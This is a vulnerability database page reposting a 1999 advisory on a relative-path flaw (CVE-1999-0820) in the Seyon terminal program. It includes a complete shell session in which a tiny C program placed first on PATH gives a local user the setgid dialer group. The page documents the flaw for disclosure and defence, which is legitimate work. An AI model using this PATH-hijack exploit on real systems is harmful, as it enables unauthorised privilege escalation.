Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-1999-0820

Publish Date: 08 Nov 1999

                							

                source: http://www.securityfocus.com/bid/780/info

Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the priviliges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix. 

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999=
=

jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat &gt; seyonx.c
void main () {
setregid(getegid(), getegid());
system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Muhammad M. Saggaf Seyon 2.14b - Relative Path

Vulmon Search

About

Products

Connect